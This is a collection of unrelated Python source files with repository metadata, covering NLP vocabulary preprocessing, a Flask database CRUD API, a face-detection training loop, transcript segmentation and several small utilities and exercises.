chs=True, char_level=False,
normalize_digits=True):
"""
创建词汇表文件(若不存在)
:param vocabulary_path: 存储位置
:param data_path_list: 用于创建词汇表的文件路径列表
:param max_character_size: 有效词汇数 保留词汇最大值
:param tokenizer: 分词器
:param chs: 中文模式(未分词中文)
:param char_level: 基于字符
:param normalize_digits: 把数字均替换为_DIG
:return:
"""
# data_path 是个路径的数组
if not gfile.Exists(vocabulary_path):
print("创建词汇表")
vcb = {}
for path in data_path_list:
with gfile.GFile(path, mode="r") as f:
print("处理%s文件" % path)
counter = 0
for line in f:
counter += 1
if counter % 10000 == 0:
print("已处理%s行" % counter)
line = tf.compat.as_text(line)
tokens = tokenizer(line) if tokenizer else basic_tokenizer(line, chs, char_level)
for token in tokens:
word = _DIGIT_RE.sub(_DIG, token) if normalize_digits else token
if word in vcb:
vcb[word] += 1
else:
vcb[word] = 1
vocab_list = _START_VOCAB + sorted(vcb, key=vcb.get, reverse=True)
if len(vocab_list) > max_character_size:
vocab_list = vocab_list[:max_character_size]
with gfile.GFile(vocabulary_path, mode="w") as vocabulary_file:
for w in vocab_list:
vocabulary_file.write(w + "\n")
else:
print("词汇表已存在,如果不对应请删除后再次运行。")
def initialize_vocabulary(vocabulary_path):
"""
从词汇表文件读取词汇表
:param vocabulary_path:
:return: dict[词,数字] and list[词]
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode="r") as f:
rev_vocab.extend(f.readlines())
rev_vocab = [tf.compat.as_text(line.strip()) for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError("Vocabulary file %s not found.", vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary,
tokenizer=None, chs=True, char_level=False,
normalize_digits=True):
"""
返回由ID组成的句子
:param sentence:
:param vocabulary: 词汇表 [词, 数字]
:param tokenizer:
:param normalize_digits:
:param chs:
:param char_level:
:return: 词汇ID的列表
"""
if tokenizer:
words = tokenizer(sentence)
else:
words = basic_tokenizer(sentence, chs, char_level)
if not normalize_digits:
return [vocabulary.get(w, UNK_ID) for w in words]
return [vocabulary.get(_DIGIT_RE.sub(_DIG, w), UNK_ID) for w in words]
def data_to_token_ids(data_path, target_path, vocabulary_path,
tokenizer=None, chs=True, char_level=False,
normalize_digits=True):
if not gfile.Exists(target_path):
print("Tokenizing data in %s" % data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(data_path, mode="r") as data_file:
with gfile.GFile(target_path, mode="w") as tokens_file:
counter = 0
for line in data_file:
counter += 1
if counter % 10000 == 0:
print(" tokenizing line %d" % counter)
token_ids = sentence_to_token_ids(tf.compat.as_text(line), vocab,
tokenizer,
chs=chs, char_level=char_level,
normalize_digits=normalize_digits)
tokens_file.write(" ".join([str(tok) for tok in token_ids]) + "\n")
else:
print("Tokenizing data is existed.(%s)" % target_path)
def prepare_data(data_dir, from_train_path, to_train_path, from_dev_path, to_dev_path,
vocabulary_size, tokenizer=None, chs=True, char_level=False):
"""
把训练文件夹下的文件转化成token id文件
:param data_dir:
:param from_train_path:
:param to_train_path:
:param from_dev_path:
:param to_dev_path:
:param vocabulary_size:
:param tokenizer:
:param chs:
:param char_level:
:return: (对话先说训练id表示,对话应答训练id表示,
对话先说测试id表示, 对话应答测试id表示,
词汇表路径)
"""
postfix = ".%s.%s.ids%d" % ("zh" if chs else "en", "ch" if char_level else "vcb", vocabulary_size)
vocab_path = os.path.join(data_dir, "vocabulary%d.txt" % vocabulary_size)
create_vocabulary(vocab_path, [from_train_path, to_train_path], vocabulary_size, tokenizer,
chs=chs, char_level=char_level)
to_train_ids_path = to_train_path + postfix
from_train_ids_path = from_train_path + postfix
data_to_token_ids(to_train_path, to_train_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
data_to_token_ids(from_train_path, from_train_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
to_dev_ids_path = to_dev_path + postfix
from_dev_ids_path = from_dev_path + postfix
data_to_token_ids(to_dev_path, to_dev_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
data_to_token_ids(from_dev_path, from_dev_ids_path, vocab_path, tokenizer, chs=chs, char_level=char_level)
return (from_train_ids_path, to_train_ids_path,
from_dev_ids_path, to_dev_ids_path,
vocab_path)
def train_text_to_ids(para, vcb_sz=None, ch_lvl=None, chs_md=None):
"""
将参数中的地址指定的文件转换成由id表示。
:param vcb_sz:
:param ch_lvl:
:param chs_md:
:return:
"""
from_train = None
to_train = None
from_dev = None
to_dev = None
vocab_path = None
vocabulary_size = para.vocabulary_size if vcb_sz is None else vcb_sz
ch_level = para.ch_level if ch_lvl is None else ch_lvl
chs_mode = para.chs_mode if chs_md is None else chs_md
if para.from_train_data and para.to_train_data:
from_train_data = para.from_train_data
to_train_data = para.to_train_data
from_dev_data = from_train_data
to_dev_data = to_train_data
if para.from_dev_data and para.to_dev_data:
from_dev_data = para.from_dev_data
to_dev_data = para.to_dev_data
from_train, to_train, from_dev, to_dev, vocab_path = prepare_data(
para.data_dir,
from_train_data, to_train_data,
from_dev_data, to_dev_data,
vocabulary_size, chs=chs_mode, char_level=ch_level)
return from_train, to_train, from_dev, to_dev, vocab_path
else:
print("Please specify the file path in %s" % para.data_dir)
return from_train, to_train, from_dev, to_dev, vocab_path
def read_data_from_many_id_files(paths):
data = []
for filepath in paths:
if gfile.Exists(filepath):
with gfile.GFile(filepath, mode="r") as f:
line = f.readline()
while line:
data.extend([int(x) for x in line.split()])
data.append(EOS_ID)
line = f.readline()
else:
raise ValueError("file %s not found.", filepath)
return data
def read_sentences_from_many_id_files(paths):
sentence_list = []
for filepath in paths:
if gfile.Exists(filepath):
with gfile.GFile(filepath, mode='r') as f:
line = f.readline()
# 若读出了一行
while line:
# 这行数据转换成id的list
sentence = [int(x) for x in line.split()]
# 不为空则添加这行数据 保证没有空的数据
if len(sentence) > 0:
sentence_list.append(sentence)
# 下一行
line = f.readline()
else:
raise ValueError("file %s not found.", filepath)
return sentence_list
def read_data(source_path, target_path, max_size=None):
data_set = []
with tf.gfile.GFile(source_path, mode="r") as source_file:
with tf.gfile.GFile(target_path, mode="r") as target_file:
source, target = source_file.readline(), target_file.readline()
counter = 0
while source and target and (not max_size or counter < max_size):
counter += 1
if counter % 50000 == 0:
print(" reading data line %d" % counter)
sys.stdout.flush()
source_ids = [int(x) for x in source.split()]
target_ids = [int(x) for x in target.split()]
len_s = len(source_ids)
len_t = len(target_ids)
if 0 < len_s <= 20 and 0 < len_t <= 20:
source_ids.extend([PAD_ID for _ in range(20-len_s)])
data_set.append([source_ids, target_ids])
source, target = source_file.readline(), target_file.readline()
return data_set
def read_id2vec(source_path, vocabulary_size):
vec_set = []
with tf.gfile.GFile(source_path, mode="r") as source_file:
source = source_file.readline()
counter = 0
while source and counter < vocabulary_size:
counter += 1
if counter % 50000 == 0:
print(" reading vector line %d" % counter)
sys.stdout.flush()
vec = [float(x) for x in source.split()]
# if len(vec) != vector_size:
# print("error")
vec_set.append(vec)
source = source_file.readline()
return vec_set
|
[
"perfect0penguin@gmail.com"
] |
perfect0penguin@gmail.com
|
d2c95d546b0c5d0ae023efb6cf4793ed337de2ea
|
f5cdcface93fa1b1899b66354c4eb84dc6cb9a25
|
/Database_flask/app.py
|
f0c84485f936e2cfa2be1377416d76fefe680150
|
[] |
no_license
|
shivanshjayara/Flask_DB
|
d90445bdd8164be8a82bca58ef94c2729641b2c1
|
b92d36e972a56b3da32184f0c70016a64b13da2e
|
refs/heads/main
| 2023-05-22T02:45:23.374693
| 2021-06-14T06:51:00
| 2021-06-14T06:51:00
| 376,554,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,936
|
py
|
from flask import Flask, request, jsonify
from mongo_db import mongo_db_class
from mysql_db import mysql_db_class
import logging as lg
app = Flask(__name__)
lg.basicConfig(filename='flask_log_file.txt', level=lg.INFO,
format='%(asctime)s, %(name)s, %(levelname)s, %(message)s', datefmt='%Y-%m-%d')
@app.route('/create', methods=['POST'])
def create_database():
db_name = 'flask1_database'
table_name = 'customer_details'
lg.info('Checking for method type')
try:
lg.info('Checking for Method whether it is POST or GET')
if request.method == 'POST':
lg.info('Method was found "POST"')
database_type = request.json['Database_Type']
lg.info(
'Setting database type variable for entering the type of database which you want to proceed with')
lg.info('Checking which type a user has entered: Mysql or Mongodb Or Cassandra')
if database_type == 'mysql':
lg.info('User has mention MySql database')
try:
lg.info('Creating an object of "class mysql_db_class"')
mysql_object = mysql_db_class(db_name, table_name)
lg.info(f'Calling "create database function" which will create a database: {db_name}')
mysql_object.create_database()
except Exception as e:
print(e)
lg.error(e)
lg.info('Database and table both has been created. For confirmation please check in your workbench')
return jsonify(
f'{database_type} database and table are created. Database name: {db_name} and table name :{table_name}')
if database_type == 'mongodb':
lg.info('User has mention MongoDB database')
lg.info('Creating an object of "mongo_db_class"')
mongodb_object = mongo_db_class(db_name, table_name)
lg.info(f'Calling "create function" which will create database: {db_name} and table: {table_name}')
mongodb_object.create()
lg.info('Finally database and table both are created now')
return jsonify(
f'{database_type} database and collection both are created. Database name is: {db_name} and collection name is: {table_name}')
except Exception as e:
print(e)
lg.error(e)
@app.route('/insert_single', methods=['POST'])
def insert():
db_name = 'flask1_database'
table_name = 'customer_details'
lg.info(f'Calling insertion function just for inserting a single record into table {table_name}')
lg.info('Checking for Method whether it is POST or GET')
if request.method == 'POST':
lg.info('Method was found "POST"')
lg.info('Checking which type a user has entered: Mysql or Mongodb Or Cassandra')
lg.info('Declaring a variable which will receive a database type from the user')
database_type = request.json['Database_Type']
if database_type == 'mysql':
lg.info('User has mention MySql database')
lg.info('Creating an object of "mysql_db_class"')
mysql_object = mysql_db_class(db_name, table_name)
lg.info(
f'Calling "insert single record function" which will insert a single record in table: {table_name}')
mysql_object.insert_single()
lg.info('Finally single record is inserted')
return jsonify(
f'Single Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
if database_type == 'mongodb':
lg.info('User has mention MongoDB database')
lg.info('Creating an object of "mongo_db_class"')
mongodb_object = mongo_db_class(db_name, table_name)
lg.info(
f'Calling "insert_single_document function" which will insert a single record in table: {table_name}')
mongodb_object.insert_single_document()
lg.info('Finally single record is inserted')
return jsonify(
f'Single Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
@app.route('/update_table', methods=['POST'])
def update_table():
db_name = 'flask1_database'
table_name = 'customer_details'
lg.info(f'Calling update function for updating table {table_name}')
lg.info('Checking for Method whether it is POST or GET')
if request.method == 'POST':
lg.info('Method was found "POST"')
lg.info('Checking which type a user has entered: Mysql or Mongodb Or Cassandra')
lg.info('Declaring a variable which will receive a database type from the user')
database_type = request.json['Database_Type']
if database_type == 'mysql':
lg.info('User has mention MySql database')
lg.info('Creating an object of "mysql_db_class"')
mysql_object = mysql_db_class(db_name, table_name)
lg.info(f'Calling "update table function" which will insert a single record in table: {table_name}')
mysql_object.update_table()
lg.info('Finally table is updated')
return jsonify(
f'Data is updated successfully in table: {table_name} in database: {db_name} of {database_type}')
if database_type == 'mongodb':
lg.info('User has mention Mongodb database')
lg.info('Creating an object of "mongodb_db_class"')
mongodb_object = mongo_db_class(db_name, table_name)
lg.info(f'Calling "update_document function" which will insert a single record in table: {table_name}')
mongodb_object.update_document()
lg.info('Finally document is updated')
return jsonify(
f'Data is updated successfully in table: {table_name} in database: {db_name} of {database_type}')
@app.route('/multiple_insert', methods=['POST'])
def multiple_insert():
db_name = 'flask1_database'
table_name = 'customer_details'
lg.info(f'Calling multiple insertion function just for inserting a single record into table {table_name}')
lg.info('Checking for Method whether it is POST or GET')
if request.method == 'POST':
lg.info('Method was found "POST"')
lg.info('Checking which type a user has entered: Mysql or Mongodb Or Cassandra')
lg.info('Declaring a variable which will receive a database type from the user')
database_type = request.json['Database_Type']
if database_type == 'mysql':
lg.info('User has mention MySql database')
lg.info('Creating an object of "mysql_db_class"')
mysql_object = mysql_db_class(db_name, table_name)
lg.info(f'Calling "Bulk_insert function" which will insert a single record in table: {table_name}')
mysql_object.bulk_insert()
lg.info('Finally table is updated')
return jsonify(
f'Bulk Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
if database_type == 'mongodb':
lg.info('User has mention Mongodb database')
lg.info('Creating an object of "mongodb_db_class"')
mongodb_object = mongo_db_class(db_name, table_name)
lg.info(
f'Calling "insert_many_document function" which will insert a single record in table: {table_name}')
mongodb_object.insert_many_document()
lg.info('Finally bulk records are inserted in document')
return jsonify(
f'Bulk Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
@app.route('/delete_data', methods=['POST'])
def delete():
db_name = 'flask1_database'
table_name = 'customer_details'
lg.info(f'Calling delete function for deleting record into table {table_name}')
lg.info('Checking for Method whether it is POST or GET')
if request.method == 'POST':
lg.info('Method was found "POST"')
lg.info('Checking which type a user has entered: Mysql or Mongodb Or Cassandra')
lg.info('Declaring a variable which will receive a database type from the user')
database_type = request.json['Database_Type']
if database_type == 'mysql':
lg.info('User has mention MySql database')
lg.info('Creating an object of "mysql_db_class"')
mysql_object = mysql_db_class(db_name, table_name)
lg.info(f'Calling "delete_row function" which will insert a single record in table: {table_name}')
mysql_object.delete_row()
lg.info('Finally record is deleted')
return jsonify(
f'Data is deleted successfully in table: {table_name} in database: {db_name} of {database_type}')
if database_type == 'mongodb':
lg.info('User has mention Mongodb database')
lg.info('Creating an object of "mongodb_db_class"')
mongodb_object = mongo_db_class(db_name, table_name)
lg.info(
f'Calling "insert_many_document function" which will insert a single record in table: {table_name}')
mongodb_object.delete_document()
lg.info('Finally document is deleted')
return jsonify(
f'Data is deleted successfully in table: {table_name} in database: {db_name} of {database_type}')
@app.route('/download_data', methods=['POST'])
def download():
lg.info('Downloading of a file will be done')
db_name = 'flask1_database'
table_name = 'customer_details'
if request.method == 'POST':
database_type = request.json['Database_Type']
if database_type == 'mysql':
lg.info('File is downloading from mysql database table into some csv file')
mysql_object = mysql_db_class(db_name, table_name)
mysql_object.download()
return jsonify(
f'Data has been downloaded to csv file from table: {table_name} in database: {db_name} of {database_type}')
if database_type == 'mongodb':
lg.info('File is downloading from mongodb database table into some csv file')
mongodb_object = mongo_db_class(db_name, table_name)
mongodb_object.download()
return jsonify(
f'Data has been downloaded to csv file from table: {table_name} in database: {db_name} of {database_type}')
if __name__ == '__main__':
app.run(debug=True)
lg.shutdown()
|
[
"noreply@github.com"
] |
shivanshjayara.noreply@github.com
|
a4fd143ac6a588f4c5a3d5b50de9587e087d6074
|
8359d0ade9f5338259e473a53f5482307d14d12f
|
/src/core/jupiter/core/use_cases/big_plans/remove.py
|
75eef43ec1f93e69fa082b54a705e7480212f079
|
[
"MIT"
] |
permissive
|
horia141/jupiter
|
0cba46b1aee24bf73e037335709fa0fce120b097
|
5be2f692e851ce18ad65df40a6c00afc00ae86ae
|
refs/heads/master
| 2023-08-15T16:09:10.631254
| 2023-06-27T05:36:02
| 2023-06-27T05:36:02
| 240,745,415
| 16
| 2
|
MIT
| 2023-09-06T20:44:17
| 2020-02-15T16:12:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
"""The command for removing a big plan."""
from dataclasses import dataclass
from jupiter.core.domain.big_plans.service.remove_service import BigPlanRemoveService
from jupiter.core.framework.base.entity_id import EntityId
from jupiter.core.framework.use_case import (
ContextProgressReporter,
UseCaseArgsBase,
)
from jupiter.core.use_cases.infra.use_cases import (
AppLoggedInMutationUseCase,
AppLoggedInUseCaseContext,
)
@dataclass
class BigPlanRemoveArgs(UseCaseArgsBase):
"""PersonFindArgs."""
ref_id: EntityId
class BigPlanRemoveUseCase(AppLoggedInMutationUseCase[BigPlanRemoveArgs, None]):
"""The command for removing a big plan."""
async def _execute(
self,
progress_reporter: ContextProgressReporter,
context: AppLoggedInUseCaseContext,
args: BigPlanRemoveArgs,
) -> None:
"""Execute the command's action."""
await BigPlanRemoveService(
self._storage_engine,
).remove(progress_reporter, context.workspace, args.ref_id)
|
[
"horia141@gmail.com"
] |
horia141@gmail.com
|
49ee8bc9cf6de2e556cd422f44a0a4c69fe2bc91
|
5b35d91bd83faa9d8cd9acef8d4fe87f07455bf5
|
/userauth/basicapp/views.py
|
fedcce68ece0d1e415c8ef505b4f89ce6a0b61f2
|
[] |
no_license
|
akshaykalucha/django-auth-forms
|
1d5c7c86e358fbedc1f373c58920df63ad8afc49
|
5562a259a0d5c9c022839c4eef6a9517fccc2e61
|
refs/heads/master
| 2022-09-23T00:10:33.004793
| 2019-06-02T18:34:53
| 2019-06-02T18:34:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
from django.shortcuts import render
from .models import Contact
def index(request):
if request.method== 'POST':
email = request.POST.get('email')
message = request.POST.get('message')
c = Contact(email=email, message=message)
c.save()
return render(request, 'basicapp/index.htm')
else:
return render(request, 'basicapp/index.htm')
# Create your views here.
|
[
"akshaykalucha@gmail.com"
] |
akshaykalucha@gmail.com
|
51497c27b205b81f1442f42dbecaaa0425b9188c
|
a81eb1d8decb2319a76778f4cfbd5624aaf0919b
|
/trax/rl/envs/online_tune.py
|
bcef89fe032444d83f9d88545f5308b1869d94a5
|
[
"Apache-2.0"
] |
permissive
|
modyharshit23/trax
|
9beecf9ec950d50b481d000cf8de50e41db95c30
|
2e6783a4674209b57482ec41e1c533a420aa6fe6
|
refs/heads/master
| 2020-08-07T19:34:23.943648
| 2019-10-08T06:39:01
| 2019-10-08T06:39:01
| 213,566,294
| 0
| 0
|
Apache-2.0
| 2019-10-08T06:36:36
| 2019-10-08T06:36:36
| null |
UTF-8
|
Python
| false
| false
| 2,086
|
py
|
# coding=utf-8
# Copyright 2019 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for OnlineTuneEnv."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
LEARNING_RATE_METRIC = ("train", "training/learning_rate")
def historical_metric_values(
history, metric, observation_range=(-np.inf, np.inf)):
"""Converts a metric stream from a trax History object into a numpy array."""
metric_sequence = history.get(*metric)
metric_values = np.array([
metric_value for (_, metric_value) in metric_sequence
])
return np.clip(metric_values, *observation_range)
def history_to_observations(history, metrics, observation_range, include_lr):
"""Converts a trax History object into a sequence of observations."""
observation_dimensions = [
historical_metric_values(history, metric, observation_range)
for metric in metrics
]
if include_lr:
# Logartihm of the learning rate.
observation_dimensions.append(np.log(historical_metric_values(
history, LEARNING_RATE_METRIC, observation_range
)))
return np.stack(observation_dimensions, axis=1)
def new_learning_rate(action, history, action_multipliers, max_lr):
"""Calculates a new learning rate based on an action."""
learning_rates = historical_metric_values(history, LEARNING_RATE_METRIC)
assert learning_rates.shape[0] > 0, "No last learning rate found in history."
current_lr = learning_rates[-1]
return min(current_lr * action_multipliers[action], max_lr)
|
[
"afrozm@google.com"
] |
afrozm@google.com
|
ffcbae29cb8d77f2e922cd933f47cef28b20c062
|
60d3c8f118c7fe3cade97165377c968c36ae4e81
|
/hask_ideas/Data/Traversable.py
|
8dbc037de79772a058515fb6cc70d90fb0fbd922
|
[
"BSD-2-Clause",
"MIT"
] |
permissive
|
billpmurphy/hask-archive
|
d6e7363dd6086ebeabf4c0c7713c1cc2e446c4a5
|
1dbecd7070cdf6e946df4236688c46ccd70d329b
|
refs/heads/master
| 2021-01-24T15:22:59.416785
| 2015-08-10T19:04:26
| 2015-08-10T19:04:26
| 33,465,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 778
|
py
|
from ..lang import build_instance
from ..Control.Applicative import Applicative
from ..Control.Monad import Monad
from Foldable import Foldable
from Functor import Functor
class Traversable(Foldable, Functor):
"""
Functors representing data structures that can be traversed from left to
right.
Dependencies:
Foldable, Functor
Attributes:
traverse, sequenceA, mapM, sequence
Minimal complete definition:
traverse
"""
@classmethod
def make_instance(typeclass, cls, traverse, sequenceA=None, mapM=None,
sequence=None):
attrs = {"traverse":traverse, "sequenceA":sequenceA, "mapM":mapM,
"sequence":sequence}
build_instance(Traversable, cls, attrs)
return
|
[
"billpmurphy92@gmail.com"
] |
billpmurphy92@gmail.com
|
b2851b1a304be6b047b9a8356ef027bc98cc0f95
|
f9ed608c620093b9f6b5058bcedf7ae610c09c8d
|
/953-Verifying_an_Alien_Dictionary.py
|
b29bd1cd3017ead5212ad421027fb92b3d98447b
|
[] |
no_license
|
chanyoonzhu/leetcode-python
|
9b88d7f2749e1ae3ed597759b1bf9f7fa4912c35
|
085d868ba0458fc8e6b5549aa00fa151c335fa7f
|
refs/heads/master
| 2022-05-24T11:20:35.927915
| 2022-04-16T06:02:33
| 2022-04-16T06:02:33
| 166,224,197
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
"""
- array sorting + hashmap
"""
class Solution:
def isAlienSorted(self, words: List[str], order: str) -> bool:
ind = {c: i for i, c in enumerate(order)}
for a, b in zip(words, words[1:]):
if len(a) > len(b) and a[:len(b)] == b:
return False
for s1, s2 in zip(a, b):
if ind[s1] < ind[s2]:
break
elif ind[s1] > ind[s2]:
return False
return True
"""
- short version
"""
class Solution:
def isAlienSorted(self, words, order):
m = {c: i for i, c in enumerate(order)}
words = [[m[c] for c in w] for w in words]
return all(w1 <= w2 for w1, w2 in zip(words, words[1:]))
|
[
"zhuchanyoon@gmail.com"
] |
zhuchanyoon@gmail.com
|
aba602a73bce2f3d700ad3f704a27f5a026008bd
|
fea398a9638acdfa2fb06e7a9695d5894452ded7
|
/0x07-python-test_driven_development/3-say_my_name.py
|
b408ac9688f6adf53264cf935daaaaf536e3d9a1
|
[] |
no_license
|
OscarDRT/holbertonschool-higher_level_programming
|
d15585aa93ced9bc04464ced9bfd4197e73c42fa
|
f57ef3344df6350bded78ffce975eea693e67727
|
refs/heads/master
| 2020-09-30T19:56:30.788311
| 2020-05-14T19:52:10
| 2020-05-14T19:52:10
| 227,360,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 581
|
py
|
#!/usr/bin/python3
"""Function that prints My name is <first name> <last name>
first_name and last_name must be strings otherwise,
raise a TypeError exception with the message
first_name must be a string or last_name must be a string
"""
def say_my_name(first_name, last_name=""):
"""
first_name and last_name must be strings
"""
if type(first_name) != str:
raise TypeError("first_name must be a string")
if type(last_name) != str:
raise TypeError("last_name must be a string")
else:
print('My name is', first_name, last_name)
|
[
"oscarnetworkingpro@gmail.com"
] |
oscarnetworkingpro@gmail.com
|
d3f804833db7e3655c2793a2465fc9a003792e38
|
625bcba8922a6d0bd4c34721354f1f87977437ad
|
/scripts/transform_ushmm_transcripts/get_text_units.py
|
ad0900650bcf18113474a0b44ae2fee962df5179
|
[] |
no_license
|
toth12/data_processing_lts
|
2970805d101154b5aa2283061da970d45538571a
|
831c3d3ccfd745606f4cc855623086b3d3c07a01
|
refs/heads/master
| 2023-04-16T06:19:18.410693
| 2021-05-04T07:55:53
| 2021-05-04T07:55:53
| 353,973,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,472
|
py
|
import sys, glob, os
root_path = os.path.join("..", "..")
sys.path.insert(0, root_path)
from docx import Document
from subprocess import call
import pprint
import constants
import re
import pdb
import os,sys
helper_path = os.path.join("..", "..", "utils")
sys.path.insert(0, helper_path)
import helper_mongo as h
import text
import folia_utils
import pdb
from data_spec import create_dictionary_of_file_list
import constants
from string import Template
import commands
import heapq
DB=constants.DB
TRACKER="USHMM_transcript_processing_progress_test"
SAMPLE_FILE='scripts/transform_ushmm_transcripts/sample_data/input_ids.txt'
INPUT_FOLDER='/Users/gmt28/Documents/Workspace/Docker_Engine/varad/Yale_Projects/shoah-foundation-data-restored/shoah-foundation-data/data/inputs/ushmm/transcripts/microsoft_doc_docx/'
def getTextUnits(filename):
doc = Document(filename)
units = list()
#Check if any known segmentation unit is available
regex_units=[r'track [0-9][0-9]',r'[A-Z][A-Z]?[.|:|-]',r'[0-9]?[0-9]:[0-9][0-9]:[0-9][0-9]',r'\[[A-Z][A-Z]\]']
question_units=["Question:","Q:","Q."]
answer_units=["Answer:",'A:','A.']
non_units = ["name:", "date:", "date", "series", "transcriber", "thesis:", "currently:", "note", "comment", "grandparents:", "transcript:", "note:","Interviewer:","Theodore:","mr.","Mr.","[DL]","[AG]","[BB]"]
for para in doc.paragraphs:
paragraph = para.text.strip()
# ensure it is not
presence_regex_unit=False
presence_answer_unit=False
presence_question_unit=False
if len(paragraph)>0:
# get first word
first_words=paragraph[0:10]
for element in question_units:
if element in first_words:
presence_question_unit=True
break
if presence_question_unit == False:
for element in answer_units:
if element in first_words:
presence_answer_unit=True
break
if presence_answer_unit==False:
for element in regex_units:
n = re.compile(element)
typer2= n.match(first_words)
if typer2 and (first_words not in non_units):
presence_regex_unit=True
break
if presence_regex_unit or presence_answer_unit or presence_question_unit:
units.append({'unit':paragraph})
elif(len(units)>0 and len(paragraph.split())>3):
if ((units[-1]['unit'].split()>3) and (units[-1]['unit'][-1] not in ['?','.','!']) ):
units[-1]['unit']=units[-1]['unit']+' '+paragraph
else:
units.append({'unit':paragraph})
else:
units.append({'unit':paragraph})
return units
def main():
ids=open(SAMPLE_FILE).readlines()
all_files=[]
for testimony_id in ids:
result=h.query(DB,TRACKER,{'id':testimony_id.strip()},{'microsoft_doc_file':1,'method':1,'id':1,'_id':0})[0]
all_files.append(result)
for element in all_files:
name=element['microsoft_doc_file'][0]
print element['id']
if name.split('.')[-1]=='doc':
result=[]
for files in element['microsoft_doc_file']:
file=INPUT_FOLDER+ files
command = 'textutil -convert docx ' + file + ' -output ' + os.getcwd()+'/sample_data/'+files+'x'
file=os.getcwd()+'/scripts/transform_ushmm_transcripts/sample_data/'+files+'x'
units=getTextUnits(file)
for i,unit in enumerate(units):
units[i]['unit']=' '.join(unit['unit'].split())
result.extend(units)
h.update_field(DB, 'output_ushmm_metadata', "testimony_id", element['id'], "structured_transcript", result)
else:
result=[]
for file in element['microsoft_doc_file']:
file=INPUT_FOLDER+file
units=getTextUnits(file)
for i,unit in enumerate(units):
units[i]['unit']=' '.join(unit['unit'].split())
result.extend(units)
h.update_field(DB, 'output_ushmm_metadata', "testimony_id", element['id'], "structured_transcript", result)
if __name__ == '__main__':
main()
|
[
"gabor.toth@yale.edu"
] |
gabor.toth@yale.edu
|
7f4c175b19ad6ad75136ed55c2d937ad98f43682
|
ffadd004f779aa6aca925d8d39775a8bd8abfc37
|
/yolo_face/TrainYamlModel.py
|
5fe750404fbe4ec97a5249753b2cd88f76fb7593
|
[] |
no_license
|
xinyunmian/face-detection
|
9b111f82916bd75ae2e2e9036f69d0ed2b0539a8
|
615c90284f3283c4764c5851e66a7a47ae0f7494
|
refs/heads/main
| 2023-08-25T18:59:23.164984
| 2021-09-13T07:27:19
| 2021-09-13T07:27:19
| 405,872,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,681
|
py
|
import torch
import os
import random
import numpy as np
import torch.utils.data as data
from FaceDataLoader import LoadFace, collate_face
from ParseYamlModel import Yaml2Pytorch
from FaceConfig import facecfg
from FaceLoss import compute_FaceLoss
#cuda
torch.cuda.set_device(0)
def adjust_learning_rate(epoch, optimizer):
lr = facecfg.lr
if epoch > 650:
lr = lr / 1000000
elif epoch > 600:
lr = lr / 100000
elif epoch > 550:
lr = lr / 10000
elif epoch > 350:
lr = lr / 1000
elif epoch > 180:
lr = lr / 100
elif epoch > 20:
lr = lr / 10
for param_group in optimizer.param_groups:
param_group["lr"] = lr
def train():
data_train = LoadFace(img_path=facecfg.data_list, cfg=facecfg)
train_loader = data.DataLoader(data_train, batch_size=facecfg.batch_size, shuffle=True, num_workers=0, collate_fn=collate_face)
net = Yaml2Pytorch(cfg=facecfg.model_yaml)
anchors = net.yaml["anchors"]
anchors = np.array(anchors, np.float32).reshape([3, 3, 2])
if facecfg.pretrain:
d_dict = torch.load(facecfg.pretrain_weights, map_location=lambda storage, loc: storage)
net.load_state_dict(d_dict)
net.cuda()
optimizer = torch.optim.SGD(net.parameters(), lr=facecfg.lr, weight_decay=facecfg.weight_decay, momentum=0.9)
net.train()
for epoch in range(facecfg.start_epoch, facecfg.epochs):
print("Epoch {}".format(epoch))
print('I am training, please wait...')
batch = 0
lr_cur = 0.01
for i, (imgs, targets, paths, _) in enumerate(train_loader):
imgs = imgs.cuda().float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
targets = targets.cuda()
outs = net(imgs)
loss, lall = compute_FaceLoss(outs, targets, anchors, wh_r=facecfg.anchor_box_ratio, downs=facecfg.strides, not_yaml=False)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch += 1
for params in optimizer.param_groups:
lr_cur = params['lr']
if batch % 5 == 0:
print("Epoch:{}/{} || Loss:{:.4f} || Box:{:.4f} || Obj:{:.4f} || Class:{:.4f} || Landmks:{:.4f} || LR: {:.8f}"
.format(epoch, facecfg.epochs, loss.item(), lall[0].item(), lall[1].item(),lall[2].item(),lall[3].item(), lr_cur))
# 调用学习率调整函数
adjust_learning_rate(epoch, optimizer)
if (epoch % 2 == 0 and epoch > 0):
torch.save(net.state_dict(), facecfg.model_save + "/" + "FaceShuffle_{}.pth".format(epoch))
if __name__ == "__main__":
train()
|
[
"18806181003@163.com"
] |
18806181003@163.com
|
472971efc2470876da78591fcbfce41064a3e72b
|
5e64a98207ac9a8ffcc1ab25fc3715bb898d3a65
|
/tests/json.tst.py
